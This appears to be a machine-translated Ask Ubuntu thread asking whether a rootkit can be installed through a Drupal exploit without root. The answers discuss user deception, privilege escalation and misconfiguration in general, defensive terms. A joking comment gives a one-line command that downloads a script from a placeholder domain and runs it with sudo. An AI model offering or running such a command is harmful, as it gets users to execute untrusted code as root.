¿Cómo se instalan los rootkits en un servidor ubuntu?

11

He visto algunas publicaciones sobre la búsqueda de rootkits, pero no he podido encontrar ninguna información sobre cómo acceder a un sistema Linux. En particular, si explota un error en un sitio web php (sí, estoy hablando de drupageddon aquí), ¿es posible instalar un rootkit aunque solo pueda ejecutarse como servidor web (www-data) y no como root. La poca información que he encontrado sobre cómo se instalan sugiere que debe ser root para instalarlos (consulte aquí ).

Lance Holland
fuente
66
He escrito un pequeño tutorial, ¿puedes instalarlo si quieres? simplemente escribawget http://mydomain/script.sh;sudo ./script.sh
Nanne
1
¡Oh, estaba esperando ESA respuesta!
Over Killer

Respuestas:

9

Si fuera yo, seguiría con el siguiente método:

  • Haga que un usuario descargue e instale una pieza de software (# 1). Haga que el software instale el software deseado. Ocultar un blob binairy dentro de esa aplicación le permite descargar software (es decir, una herramienta que puede usar para ftp, wget, etc.).
  • Solicite la cuenta de administrador (# 2) y úsela para usar una instancia de ftp, wget para descargar e instalar el rootkit.

Con respecto al n. ° 1: un usuario nunca debe descargar software aleatorio cuando usa Linux; use los canales apropiados (Centro de software de Ubuntu) para instalar el software. Si es un software que debe descargarse fuera de los canales apropiados, asegúrese de que se pueda confiar en la fuente de la descarga. Piense en las últimas versiones del software Apache o MySQL. No andes descargando software aleatorio sin consultar diferentes redes sociales sobre la integridad de esa aplicación. Microsoft nunca centralizó el software; resultó en que mucha gente incursionó en el software, por lo que su base de usuarios es enorme, pero eso también facilitó el acceso a las computadoras y comenzó a recopilar datos que pueden vender.

Con respecto al n. ° 2: falla fatal del usuario. Nunca jamás escriba su contraseña de administrador a menos que sepa por qué se le pide.

Rinzwind
fuente
8

Sí, en general se requieren permisos de root para instalar un rootkit. Muchos de los rootkits contienen un módulo que se carga en el kernel, otra herramienta de sobrescritura que suele utilizar root. En un sistema correctamente configurado y perfecto, no habría forma de instalar el kit raíz sin privilegios de root, pero ...

... puede haber problemas con la configuración del sistema que lo hacen inseguro. ... puede haber errores de seguridad que permiten una elevación de privilegios ... puede haber formas de engañar a un usuario con permisos de root para ejecutar algo malo.

Los caminos son tan ilimitados como la imaginación del intruso.

Klaus D.
fuente